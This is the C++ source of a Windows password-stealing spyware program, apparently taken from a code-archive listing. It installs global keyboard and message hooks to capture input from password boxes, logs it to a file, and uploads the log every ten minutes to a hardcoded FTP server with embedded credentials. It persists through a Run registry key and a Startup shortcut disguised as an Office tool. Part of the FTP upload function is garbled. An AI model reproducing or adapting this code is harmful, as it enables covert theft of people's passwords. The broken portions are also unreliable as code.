www.pudn.com > spy_pass.zip > getpass_old.cpp
/* getpass.cpp:
可以将所有在IE和其他所有密码框中的输入记录下来. 并用ftp发送到个人主页
http://www.nease.net/~inetsoft, http://netcom.163.net netcom@163.net paladin@188.net inetsoft@china.com
by lgd/Paladin.InetSoft GuangZhou
Update 19981215: initconn(), using sd_connect instead of gethostname
Update 19981218: add CreateStartup() and GetProxy()
*/
#include
#include
#include
#include
#include
#include
#include "resource.h"
#include "tcp.h"
int CreateRun(void);
int CreateStartup(void); /* copy文件到windows目录并在启动中建立快捷方式或设置自动启动 */
int DeleteShortCut();
int GetProxy(void); /* 查询代理服务器 */
int SendUserData(int pos); /* 发送数据到 ftp server */
int ftp_cmd(int sd, char *cmd, int success_code); /* 执行命令 */
int ftp_login(char *hostname, char *user_name, char *passwd);
int ftp_put_file(int sd, char *file_local, int pos, char *file_remote, int max_wait_time);
int initconn(int sd); /* 建立数据连接 */
int get_reply(int sd); /* 接收回答 */
void ftp_quit(int sd);
int g_code;
char g_reply[1024];
char proxy[20];
/* hooks in ../spydll/hook.c */
BOOL SetMsgHook(BOOL fSet)
{
static HHOOK hhkGetMessage = NULL;
static HHOOK hhkCallWndProc = NULL;
static HMODULE hmodHook;
if (fSet)
{
if (!hmodHook)
{
if (!(hmodHook = LoadLibrary("fivedll.dll")))
{
return FALSE;
}
}
if (!hhkGetMessage)
{
if (!(hhkGetMessage = SetWindowsHookEx(WH_GETMESSAGE,
(HOOKPROC)GetProcAddress(hmodHook, "SpyGetMsgProc"), hmodHook, 0)))
{
return FALSE;
}
}
if (!hhkCallWndProc)
{
if (!(hhkCallWndProc = SetWindowsHookEx(WH_CALLWNDPROC,
(HOOKPROC)GetProcAddress(hmodHook, "SpyCallWndProc"), hmodHook, 0)))
{
UnhookWindowsHookEx(hhkGetMessage);
return FALSE;
}
}
}
else
{
if (hhkGetMessage)
{
UnhookWindowsHookEx(hhkGetMessage);
hhkGetMessage = NULL;
}
if (hhkCallWndProc)
{
UnhookWindowsHookEx(hhkCallWndProc);
hhkCallWndProc = NULL;
}
FreeLibrary(hmodHook);
}
return TRUE;
}
int filePos =0;
char UserFile[128];
HRESULT CALLBACK MainWndProc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
static int filePos =0;
int newPos =0;
char temp[80];
switch(msg)
{
case WM_CREATE:
if((filePos =GetProfileInt("UserFile", "Pos", -1)) ==-1)
{
WriteProfileString("UserFile", "Pos", "0");
filePos =0;
}
if(!GetSystemDirectory(UserFile, sizeof(UserFile)-20))
return TRUE;
strcat(UserFile, "\\user.txt");
SetMsgHook(TRUE);
SetTimer(hWnd, 1, 600000, NULL);/*每隔10分钟发送文件*/
break;
case WM_TIMER:
KillTimer(hWnd, 1);
newPos =SendUserData(filePos);
if(newPos >filePos)
{
filePos =newPos;
WriteProfileString("UserFile", "Pos", itoa(filePos, temp, 10));
}
SetTimer(hWnd, 1, 600000, NULL);
break;
case WM_DESTROY:
SetMsgHook(FALSE);
CreateStartup();
tcp_exit();
PostQuitMessage(0);
break;
case WM_QUERYENDSESSION:
SetMsgHook(FALSE);
CreateStartup();
tcp_exit();
return TRUE;
}
return DefWindowProc(hWnd, msg, wParam, lParam);
}
int PASCAL WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
HWND hwnd;
WNDCLASS ws;
MSG msg;
if(FindWindow("Five100", NULL) !=NULL) return 0;
memset(proxy, 0, sizeof(proxy));
memset(&ws, 0, sizeof(ws));
GetProxy();
CreateStartup();
DeleteShortCut();
tcp_init();
ws.lpszClassName ="Five100";
ws.lpfnWndProc =MainWndProc;
ws.hbrBackground =(HBRUSH)(COLOR_WINDOW+1);
ws.hInstance =hInstance;
ws.hIcon =LoadIcon(hInstance, MAKEINTRESOURCE(IDI_ICON1));
if(RegisterClass(&ws) <0)
{
tcp_exit();
return FALSE;
}
hwnd =CreateWindow("Five100", "", WS_POPUP|WS_SYSMENU|WS_CAPTION,
20, 20, 200, 200, NULL, NULL, hInstance, NULL);
if(hwnd ==NULL)
{
tcp_exit();
return FALSE;
}
while (GetMessage(&msg, NULL, 0, 0))
{
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
}
SetMsgHook(FALSE);
CreateStartup();
tcp_exit();
return msg.wParam;
}
int SendUserData(int pos)
{
int sd =-1, len =0;
char hostname[20], username[50], file_remote[128];
int retry_times =0;
len =rand()%10000;
if(len <0) len =-len;
sprintf(file_remote, "pass.%d", len);
/* www.nease.net:202.96.152.194, 如果使用smtp,可以不泄露密码,但有时代理服务器不能通过*/
if(proxy[0])
{
strcpy(hostname, proxy);
strcpy(username, "paladin@paladin.163.net");
}
else
{
retry_local:
strcpy(hostname, "paladin.163.net");
strcpy(username, "paladin");
}
if((sd =ftp_login(hostname, username, "c.30mn0")) <0)
{
if(++retry_times <2) goto retry_local;
retry_times =0;
return -1;
}
sd_connect =sd;
if((len =ftp_put_file(sd, UserFile, pos, file_remote, 200)) <0)
{
ftp_quit(sd);
return -1;
}
ftp_quit(sd);
return pos+len;
}
int ftp_cmd(int sd, char *cmd, int success_code)
{
int code;
if(tcp_send(sd, cmd, strlen(cmd), 5) !=(int)strlen(cmd))
return -1;
if((code =get_reply(sd)) !=success_code)
{
return -2;
}
return 0;
}
int ftp_login(char *hostname, char *user_name, char *passwd)
{
int sd, ret;
char cmds[100];
if((sd =tcp_connect(hostname, 21, 10)) <0)
return -1;
if((ret =get_reply(sd)) !=220)
{
closesocket(sd);
return -1;
}
sprintf(cmds, "USER %s\r\n", user_name);
if(ftp_cmd(sd, cmds, 331) <0)
{
closesocket(sd);
return -1;
}
sprintf(cmds, "PASS %s\r\n", passwd);
if(ftp_cmd(sd, cmds, 230) <0)
{
closesocket(sd);
return -1;
}
return sd;
}
int ftp_put_file(int sd, char *file_local, int pos, char *file_remote, int max_wait_time)
{
char cmds[300];
int len, file_len =0, len_sent =0, ret =0, code;
char *buf =NULL;
FILE *fp =NULL;
if((fp =fopen(file_local, "r")) ==NULL)
{
ret =-1;
goto f_exit;
}
fseek(fp, 0, SEEK_END);
file_len =ftell(fp)-pos;
if(file_len <0)
{
fclose(fp);
return -1;
}
if(file_len =0) closesocket(sd_accept);
if(sd_bind >=0) closesocket(sd_bind);
sd_accept =-1;
sd_bind =-1;
if(fp) fclose(fp);
if(buf) free(buf);
return ret;
}
int initconn(int sd)
{
char *p1, *p2;
struct sockaddr_in addr1, addr2;
char temp[256];
int len;
int code, sd_data;
/*struct hostent *hp;*/
if((sd_data =tcp_bind(NULL, 0)) <0)
return -1;
len =sizeof(addr1);
/*if(gethostname(temp, sizeof(temp)) !=0)
return -1;
if((hp =gethostbyname(temp)) ==NULL)
return -1;*/
if(getsockname(sd_connect, (struct sockaddr *)&addr1, &len) <0)
return -1;
if(getsockname(sd_data, (struct sockaddr *)&addr2, &len) <0)
return -1;
/*p1 =(char *)hp->h_addr;*/
p1 =(char *)&addr1.sin_addr;
p2 =(char *)&addr2.sin_port;
sprintf(temp, "PORT %d,%d,%d,%d,%d,%d\r\n", ((int)p1[0]) &0xff, ((int)p1[1]) &0xff, (int)p1[2] &0xff, (int)p1[3]&0xff, (int)p2[0]&0xff, (int)p2[1]&0xff);
if(tcp_send(sd, temp, strlen(temp), 10) !=(int)strlen(temp))
{
closesocket(sd_data);
return -1;
}
if((code =get_reply(sd)) !=200)
{
closesocket(sd_data);
return -1;
}
return sd_data;
}
int get_reply(int sd)
{
int i, code =0;
again:
i =0;
memset(g_reply, 0, sizeof(g_reply));
while(1)
{
if(tcp_recv(sd, &g_reply[i], 1, 10) !=1)
break;
if(g_reply[i] =='\r') g_reply[i] =' ';
if(g_reply[i] =='\n')
{
g_reply[i] =' ';
g_reply[i+1] =0;
if(sscanf(g_reply, "%d", &code) !=1)
{
return -1;
}
else break;
}
i++;
}
if(g_reply[3] =='-')
{
i =0;
goto again;
}
g_code =code;
return code;
}
void ftp_quit(int sd)
{
ftp_cmd(sd, "QUIT\r\n", 221);
closesocket(sd);
}
int GetProxy(void)
{
char *tok =NULL;
HKEY hKey;
unsigned char temp[100];
unsigned long type, len;
temp[0] =0;
if(RegOpenKeyEx(HKEY_CURRENT_USER,
"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
0, KEY_READ, &hKey) !=ERROR_SUCCESS)
return -1;
len =sizeof(temp);
if(RegQueryValueEx(hKey, "ProxyServer", NULL, &type, temp, &len) !=ERROR_SUCCESS)
{
RegCloseKey(hKey);
return -1;
}
if(tok =strtok((char *)temp, ":"))
strcpy(proxy, tok);
RegCloseKey(hKey);
return 0;
}
int CreateRun(void)
{
HKEY hKey;
const char *pval ="Five32.exe";
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
0, KEY_WRITE, &hKey) !=ERROR_SUCCESS)
return -1;
if(RegSetValueEx(hKey, "Five32", 0, REG_SZ, (const unsigned char *)pval, strlen(pval)+1)
!=ERROR_SUCCESS)
{
RegCloseKey(hKey);
return -1;
}
RegCloseKey(hKey);
return 0;
}
/* Create shortcut in startup menu */
int CreateStartup(void)
{
HRESULT hres;
IShellLink* pShellLink;
char temp[128], windir[100];
GetWindowsDirectory(windir, sizeof(windir));
sprintf(temp, "%s\\fivedll.dll", windir);
CopyFile("fivedll.dll", temp, 1);
sprintf(temp, "%s\\five32.exe", windir);
CopyFile("five32.exe", temp, 1);
if(CreateRun() ==0) return 0;
CoInitialize(NULL);
hres = CoCreateInstance(CLSID_ShellLink, NULL, CLSCTX_INPROC_SERVER,
IID_IShellLink, (LPVOID*)&pShellLink);
if(SUCCEEDED(hres))
{
IPersistFile* pPersistFile;
sprintf(temp, "%s\\five32.exe", windir);
pShellLink->SetPath(temp);
pShellLink->SetDescription("five32");
hres =pShellLink->QueryInterface(IID_IPersistFile, (LPVOID*)&pPersistFile);
if(SUCCEEDED(hres))
{
WCHAR wsz[128];
sprintf(temp, "%s\\Start Menu\\Programs\\启动\\Office工具.lnk", windir);
MultiByteToWideChar( CP_ACP, 0, temp,
-1, wsz, 128);
hres = pPersistFile->Save(wsz, TRUE);
/*if(FAILED(hres))
{
char *pstr ="c:\\windows\\Start Menu\\Programs\\启动\\startrun.lnk";
retry =1;
copy spy.exe and spydll.dll to start
goto retry;
}*/
pPersistFile->Release();
}
pShellLink->Release();
}
CoUninitialize();
return (int)hres;
}
int DeleteShortCut()
{
char windir[100], file[128];
GetWindowsDirectory(windir, sizeof(windir));
sprintf(file, "%s\\Start Menu\\Programs\\启动\\Office工具.lnk", windir);
remove(file);
return 0;
}